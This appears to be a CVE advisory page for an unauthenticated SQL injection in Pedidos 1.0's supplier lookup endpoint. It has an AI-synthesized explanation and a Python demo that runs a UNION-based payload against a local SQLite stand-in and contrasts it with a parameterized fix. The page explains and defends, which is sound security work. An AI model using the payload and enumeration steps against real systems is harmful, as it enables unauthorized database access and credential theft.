CVE-2018-25172
Description
Pedidos 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'q' parameter. Attackers can send GET requests to the ajax/load_proveedores.php endpoint with crafted SQL payloads to extract sensitive database information including schema names and table structures.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Pedidos 1.0 contains an unauthenticated SQL injection vulnerability in the 'q' parameter of ajax/load_proveedores.php, allowing attackers to extract database schema and table structures.
Vulnerability Details
Pedidos 1.0 is vulnerable to SQL injection in the ajax/load_proveedores.php endpoint. The q parameter is concatenated into the SQL statement without validation or parameterization, so an unauthenticated attacker controls part of the query text and can append arbitrary SQL [1]. The official description confirms that the injection point is this parameter.
Exploitation
An attacker can exploit this vulnerability by sending a crafted GET request to ajax/load_proveedores.php?q=[SQL]. No authentication is required. The proof-of-concept demonstrates a UNION-based injection that extracts database schema names using GROUP_CONCAT over INFORMATION_SCHEMA.SCHEMATA [1], which points to a MySQL-compatible backend. The payload is URL-encoded because quotes, spaces and parentheses cannot travel raw in a query string; the application decodes it before use, so the encoding is transport, not a filter bypass.
Impact
Successful exploitation allows an attacker to retrieve sensitive database information, starting with schema names and table structures. Because the injected SQL runs with the privileges of the application's database user, the same technique can then be used to read any table that user can access, such as user credentials or other confidential records, which makes this a stepping stone for further compromise.
Mitigation
As of the publication date, no official patch has been released for Pedidos 1.0, and the project may be abandoned. The durable fix is to pass q to the database as a bound parameter of a prepared statement instead of concatenating it into the query text. Input validation (for example, restricting q to the characters a supplier name actually needs) adds defence in depth, and a web application firewall (WAF) rule blocking SQL injection patterns is only a stopgap that a determined attacker can usually evade.
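The following is an added illustration of the exploitation and mitigation described above; it is not code from Pedidos and the page does not show the application's source. A SQLite in-memory database stands in for the MySQL backend, so the payload enumerates sqlite_master rather than INFORMATION_SCHEMA.SCHEMATA; the table and column names (proveedores, nombre, usuarios) and the shape of the lookup query are assumptions. The vulnerable handler splices q into the SQL text, the hardened handler binds it as a parameter, and the request helper shows that URL-encoding the payload is undone by the server before the query runs.

```python
import sqlite3
from urllib.parse import quote, unquote

# Constructed sample schema standing in for the application's database.
# Names are assumptions for illustration; the advisory does not show Pedidos's schema.
SCHEMA = """
CREATE TABLE proveedores (id INTEGER PRIMARY KEY, nombre TEXT);
CREATE TABLE usuarios (id INTEGER PRIMARY KEY, usuario TEXT, clave TEXT);
INSERT INTO proveedores (nombre) VALUES ('Acme S.A.'), ('Bravo Ltda.');
INSERT INTO usuarios (usuario, clave) VALUES ('admin', 'not-a-real-hash');
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def load_proveedores_vulnerable(conn, q):
    """Supplier lookup in the pattern the advisory describes: q is spliced into the SQL text."""
    sql = "SELECT nombre FROM proveedores WHERE nombre LIKE '%" + q + "%'"
    return [row[0] for row in conn.execute(sql)]


def load_proveedores_fixed(conn, q):
    """Same lookup with q bound as a parameter: it can match or not match, but it can
    never change the structure of the statement. (% and _ inside q still act as LIKE
    wildcards; that affects only which rows match, not what SQL runs.)"""
    sql = "SELECT nombre FROM proveedores WHERE nombre LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + q + "%",))]


# UNION-based payload in the shape the advisory reports: close the string, append a SELECT
# that aggregates metadata with group_concat, comment out the rest of the original query.
# The MySQL PoC reads INFORMATION_SCHEMA.SCHEMATA; sqlite_master is the SQLite analogue.
PAYLOAD = "' UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table'-- "


def request_url(payload):
    """URL-encode the payload as a browser or curl must to carry it in a query string.
    The server decodes it before use, so this is transport, not evasion."""
    return "/ajax/load_proveedores.php?q=" + quote(payload, safe="")


def handle_get(conn, url, handler):
    """Minimal stand-in for the endpoint: extract q from the URL, decode it, run the handler."""
    q = unquote(url.split("?q=", 1)[1])
    return handler(conn, q)


if __name__ == "__main__":
    conn = build_db()
    url = request_url(PAYLOAD)
    print(url)
    # Vulnerable: the supplier names come back along with a row listing every table.
    print("vulnerable:", handle_get(conn, url, load_proveedores_vulnerable))
    # Fixed: the same payload is just a string nobody's name contains, so nothing matches.
    print("fixed:     ", handle_get(conn, url, load_proveedores_fixed))
```

Running the script prints the encoded request URL, then the vulnerable result containing a row such as `proveedores,usuarios` next to the legitimate supplier names, and an empty list for the hardened handler. On the real target the aggregated row would carry schema names from INFORMATION_SCHEMA.SCHEMATA, and further UNION queries against INFORMATION_SCHEMA.COLUMNS and the data tables follow the same pattern.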
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (2)
News mentions (0)
No linked articles in our index yet.